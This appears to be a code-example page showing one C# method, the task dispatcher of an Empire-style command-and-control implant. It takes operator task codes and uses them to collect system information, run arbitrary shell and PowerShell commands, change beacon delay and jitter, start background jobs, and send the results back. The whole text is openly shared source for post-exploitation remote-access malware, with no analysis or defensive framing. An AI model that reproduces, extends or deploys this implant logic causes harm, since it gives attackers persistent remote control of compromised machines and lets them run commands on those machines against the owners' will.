예제 #1
0
        ////////////////////////////////////////////////////////////////////////////////
        //The hard part
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] ProcessTasking(PACKET packet)
        {
            byte[] returnPacket = new byte[0];
            try
            {
                //Change this to a switch : case
                int type = packet.type;
                switch (type)
                {
                case 1:
                    byte[] systemInformationBytes = EmpireStager.GetSystemInformation("0", "servername");
                    string systemInformation      = Encoding.ASCII.GetString(systemInformationBytes);
                    return(EncodePacket(1, systemInformation, packet.taskId));

                case 2:
                    string message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting";
                    SendMessage(EncodePacket(2, message, packet.taskId));
                    Environment.Exit(0);
                    //This is still dumb
                    return(new byte[0]);

                case 40:
                    string[] parts = packet.data.Split(' ');
                    string   output;
                    if (parts[0] == "Set-Delay")
                    {
                        Console.WriteLine("Current delay" + sessionInfo.GetDefaultDelay());
                        sessionInfo.SetDefaultDelay(UInt32.Parse(parts[1]));
                        sessionInfo.SetDefaultJitter(UInt32.Parse(parts[2]));
                        output = "Delay set to " + parts[1] + "Jitter set to " + parts[2];
                    }
                    else if (1 == parts.Length)
                    {
                        output = Agent.InvokeShellCommand(parts.FirstOrDefault(), "");
                    }
                    else
                    {
                        output = Agent.InvokeShellCommand(parts.FirstOrDefault(), string.Join(" ", parts.Skip(1).Take(parts.Length - 1).ToArray()));
                    }
                    byte[] packetBytes = EncodePacket(packet.type, output, packet.taskId);
                    return(packetBytes);

                case 41:
                    return(Task41(packet));

                case 42:
                    return(Task42(packet));

                case 43:
                    return(Task43(packet));

                case 44:
                    return(Task44(packet));

                case 50:
                    List <string> runningJobs = new List <string>(jobTracking.jobs.Keys);
                    return(EncodePacket(packet.type, runningJobs.ToArray(), packet.taskId));

                case 51:
                    return(Task51(packet));

                case 100:
                    return(EncodePacket(packet.type, Agent.RunPowerShell(packet.data), packet.taskId));

                case 101:
                    return(Task101(packet));

                case 110:
                    string jobId = jobTracking.StartAgentJob(packet.data, packet.taskId);
                    return(EncodePacket(packet.type, "Job started: " + jobId, packet.taskId));

                case 111:
                    return(EncodePacket(packet.type, "Not Implimented", packet.taskId));

                case 120:
                    return(Task120(packet));

                case 121:
                    return(Task121(packet));

                default:
                    return(EncodePacket(0, "Invalid type: " + packet.type, packet.taskId));
                }
            }
            catch (Exception error)
            {
                return(EncodePacket(packet.type, "Error running command: " + error, packet.taskId));
            }
        }